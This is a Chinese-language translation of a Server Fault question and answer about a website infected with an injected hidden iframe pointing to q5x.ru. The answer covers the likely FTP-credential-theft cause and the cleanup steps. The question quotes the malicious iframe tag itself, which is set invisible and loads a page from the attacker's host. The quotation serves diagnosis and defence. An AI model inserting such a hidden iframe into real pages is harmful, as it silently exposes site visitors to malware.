Website

網站被隱藏的 iframe (q5x.ru) 攻擊

  • March 25, 2010

我的一個網站最近感染了某種涉及注入隱藏 iframe 的攻擊,它的來源來自一個網站 q5x.ru(請勿連結)。

Google搜尋並沒有幫助我弄清楚這次攻擊是如何發生的,所以我想知道你們中是否有人遇到過同樣的問題?

iframe 程式碼是這樣的:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

根據要求,我正在執行一個帶有數據庫的 ASP.Net 網站,就表單而言,顯然是用於回發的 ASP.Net 表單。

我們最近在我們客戶的一個網站上遇到了同樣的問題。

此問題很可能是由主要針對 FTP 客戶端並蒐索主機名/使用者名/密碼組合的病毒感染引起的。找到後,將打開與 FTP 伺服器的連接,並蒐索 index.* 文件並將 iFrame 添加到其中。

在我們的特殊情況下,我們的客戶端是少數可以直接訪問 FTP 伺服器的客戶端之一。我們立即更改了密碼,恢復了文件的備份並刪除了我們客戶的 FTP 訪問權限。

您應該採取的步驟:

  • 立即更改密碼
  • 如果您有權訪問伺服器 FTP 日誌,請找出哪些文件已被感染
  • 對於受感染的文件,我強烈建議手動恢復這些文件,預設情況下不要使用搜尋/替換。在大多數情況下,IFrame 會添加到文件末尾,但我也看到文件被部分刪除。

另請注意,如果Google 爬蟲在受感染時訪問您的網站,它會將您添加到惡意軟體列表中,這將嚴重影響您網站的聲譽。如果發生這種情況,請採取以下步驟

  1. 確保該站點不再包含受感染的文件
  2. 確保您的網站已通過Google 網站管理員工具驗證
  3. 使用 Google 網站管理員工具請求新網站審核

引用自:https://serverfault.com/questions/126238